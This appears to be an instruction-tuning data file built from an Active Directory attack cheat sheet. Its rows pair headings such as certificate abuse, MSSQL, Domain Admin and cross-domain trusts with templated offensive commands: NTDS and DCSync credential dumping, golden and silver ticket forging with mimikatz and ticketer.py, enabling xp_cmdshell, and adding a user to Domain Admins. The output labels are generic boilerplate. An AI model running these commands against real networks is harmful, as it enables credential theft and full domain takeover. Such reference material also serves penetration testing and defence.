instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Socks (relay)
proxychains atexec.py -no-pass <domain>/<user>@<ip> "command"
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains smbexec.py -no-pass <domain>/<user>@<ip>
Note or procedural step under 'Socks (relay)'.
Certificate (pfx)
unpac the hash
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <crt_file> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
gettgtpkinit.py -cert-pfx <crt.pfx> -pfx-pass <crt_pass> "<domain>/<dc_name>" <tgt.ccache>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
getnthash.py -key '<AS-REP encryption key>' '<domain>'/'<dc_name>'
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Pass the certificate
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
pkinit
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-pass "<cert-password>"] "<fqdn_domain>/<user>" "<tgt_ccache_file>"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Rubeus.exe asktgt /user:"<username>" /certificate:"<pfx_file>" [/password:"<certificate_password>"] /domain:"<fqdn-domain>" /dc:"<dc>" /show
Tool or command referenced under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <crt_file> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
schannel
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <pfx_file> -ldap-shell
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
add_computer
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Set RBCD
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy cert -pfx "<pfx_file>" -nokey -out "user.crt"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy cert -pfx "<pfx_file>" -nocert -out "user.key"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
passthecert.py -action ldap-shell -crt <user.crt> -key <user.key> -domain <domain> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
MSSQL
find mssql access
Note or procedural step under 'MSSQL'.
MSSQL
nxc mssql <ip> -u <user> -p <password> -d <domain>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
MSSQL
Users or Computers with SQL admin
Note or procedural step under 'MSSQL'.
MSSQL
MATCH p=(u:Base)-[:SQLAdmin]->(c:Computer) RETURN p
Note or procedural step under 'MSSQL'.
MSSQL
MSSQL
Note or procedural step under 'MSSQL'.
MSSQL
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
Note or procedural step under 'MSSQL'.
MSSQL
enum_db
Note or procedural step under 'MSSQL'.
MSSQL
enable_xp_cmdshell
Note or procedural step under 'MSSQL'.
MSSQL
xp_cmdshell <cmd>
Note or procedural step under 'MSSQL'.
MSSQL
enum_impersonate
Note or procedural step under 'MSSQL'.
MSSQL
exec_as_user <user>
Note or procedural step under 'MSSQL'.
MSSQL
exec_as_login <login>
Note or procedural step under 'MSSQL'.
MSSQL
xp_dir_tree <ip>
Note or procedural step under 'MSSQL'.
MSSQL
COERCE SMB
Note or procedural step under 'MSSQL'.
MSSQL
trustlink
Note or procedural step under 'MSSQL'.
MSSQL
sp_linkedservers
Note or procedural step under 'MSSQL'.
MSSQL
use_link
Note or procedural step under 'MSSQL'.
Domain Admin
Dump ntds.dit
Note or procedural step under 'Domain Admin'.
Domain Admin
nxc smb <dcip> -u <user> -p <password> -d <domain> --ntds
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Domain Admin
secretsdump.py '<domain>/<user>:<pass>'@<ip>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
Note or procedural step under 'Domain Admin'.
Domain Admin
secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
msf> windows/gather/credentials/domain_hashdump
Tool or command referenced under 'Domain Admin'.
Domain Admin
mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
certsync -u <user> -p '<password>' -d <domain> -dc-ip <dc_ip> -ns <name_server>
Note or procedural step under 'Domain Admin'.
Grab backup Keys
donpapi collect - H ':<hash>' <domain>/<user>@<ip_range> -t ALL --fetch-pvk #Credentials
Note or procedural step under 'Grab backup Keys'.
Enumeration
nltest.exe /trusted_domains
Note or procedural step under 'Enumeration'.
Enumeration
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Note or procedural step under 'Enumeration'.
Enumeration
Get-DomainTrust -Domain <domain>
Note or procedural step under 'Enumeration'.
Enumeration
Get-DomainTrustMapping
Note or procedural step under 'Enumeration'.
Enumeration
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> trusts
Note or procedural step under 'Enumeration'.
Enumeration
sharphound.exe -c trusts -d <domain>
Note or procedural step under 'Enumeration'.
Enumeration
MATCH p=(:Domain)-[:TrustedBy]->(:Domain) RETURN p
Note or procedural step under 'Enumeration'.
Enumeration
Get Domains SID
Note or procedural step under 'Enumeration'.
Enumeration
Get-DomainSID -Domain <domain> Get-DomainSID -Domain <target_domain>
Note or procedural step under 'Enumeration'.
Enumeration
lookupsid.py -domain-sids <domain>/<user>:<password>'@<dc> 0 lookupsid.py -domain-sids <domain>/<user>:<password>'@<target_dc> 0
Note or procedural step under 'Enumeration'.
Child->Parent
Trust Key
Note or procedural step under 'Child->Parent'.
Child->Parent
mimikatz lsadump::trust /patch
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Child->Parent
mimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbtgt /target:<target_domain> /ptt
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Child->Parent
secretsdump.py -just-dc-user '<parent_domain>$' <domain>/<user>:<password>@<dc_ip>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Child->Parent
ticketer.py -nthash <trust_key> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 -spn krbtgt/<parent_domain> trustfakeuser
Note or procedural step under 'Child->Parent'.
Child->Parent
Golden Ticket
Note or procedural step under 'Child->Parent'.
Child->Parent
mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Child->Parent
mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Child->Parent
raiseChild.py <child_domain>/<user>:<password>
Note or procedural step under 'Child->Parent'.
Child->Parent
ticketer.py -nthash <child_krbtgt_hash> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 goldenuser
Note or procedural step under 'Child->Parent'.
Child->Parent
Unconstrained delegation
Note or procedural step under 'Child->Parent'.
Child->Parent
coerce parent_dc on child_dc domain #unconstrained delegation
Note or procedural step under 'Child->Parent'.
Parent->Child
same as Child to parent
Note or procedural step under 'Parent->Child'.
External Trust
DomainA <--> DomainB trust (B trust A, A trust B)
Note or procedural step under 'External Trust'.
External Trust
from A to B FOREST_TRANSITIVE
Note or procedural step under 'External Trust'.
External Trust
password reuse
Note or procedural step under 'External Trust'.
External Trust
lat move (creds/pth/...)
Note or procedural step under 'External Trust'.
External Trust
Foreign group and users
Note or procedural step under 'External Trust'.
External Trust
Users with foreign Domain Group Membership
Note or procedural step under 'External Trust'.
External Trust
MATCH p=(n:User {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p
Note or procedural step under 'External Trust'.
External Trust
Group with foreign Domain Group Membership
Note or procedural step under 'External Trust'.
External Trust
MATCH p=(n:Group {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p
Note or procedural step under 'External Trust'.
External Trust
SID History on B
Note or procedural step under 'External Trust'.
External Trust
Golden ticket
Note or procedural step under 'External Trust'.
External Trust
mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
External Trust
mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
External Trust
ticketer.py -nthash <krbtgt> -domain-sid <domain_a> -domain <domain_a> -extra-sid <domain_b_sid>-<group_sid sup 1000> fakeuser
Note or procedural step under 'External Trust'.
External Trust
Trust ticket
Note or procedural step under 'External Trust'.
External Trust
ADCS abuse
Note or procedural step under 'External Trust'.
External Trust
Unconstrained delegation
Note or procedural step under 'External Trust'.
External Trust
coerce dc_b on dc_a #Uncontrained Delegation (ADCS)
Note or procedural step under 'External Trust'.
External Trust
from A to B is FOREST_TRANSITIVE|TREAT_AS_EXTERNAL
Note or procedural step under 'External Trust'.
External Trust
DomainA <-- DomainB trust (B trust A / A access B)
Note or procedural step under 'External Trust'.
External Trust
Same as double trust, but no unconstrained delegation as B can't connect to A
Note or procedural step under 'External Trust'.
External Trust
DomainA --> DomainB trust (A trust B / B access A)
Note or procedural step under 'External Trust'.
External Trust
password reuse #lat move (creds/pth/...)
Note or procedural step under 'External Trust'.
Mssql links
MSSQL trusted links doesn't care of trust link
Note or procedural step under 'Mssql links'.
Mssql links
Get-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance>
Note or procedural step under 'Mssql links'.
Mssql links
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
Note or procedural step under 'Mssql links'.
Mssql links
trustlink
Note or procedural step under 'Mssql links'.
Mssql links
sp_linkedservers
Note or procedural step under 'Mssql links'.
Mssql links
use_link
Note or procedural step under 'Mssql links'.
ADD DA
net group "domain admins" myuser /add /domain
Note or procedural step under 'ADD DA'.
Golden Ticket
ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser>
Note or procedural step under 'Golden Ticket'.
Golden Ticket
mimikatz "kerberos::golden /user:<admin_user> /domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Silver Ticket
mimikatz "kerberos::golden /sid:<current_user_sid> /domain:<domain-sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes256_key> /user:<any_user> /ptt"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.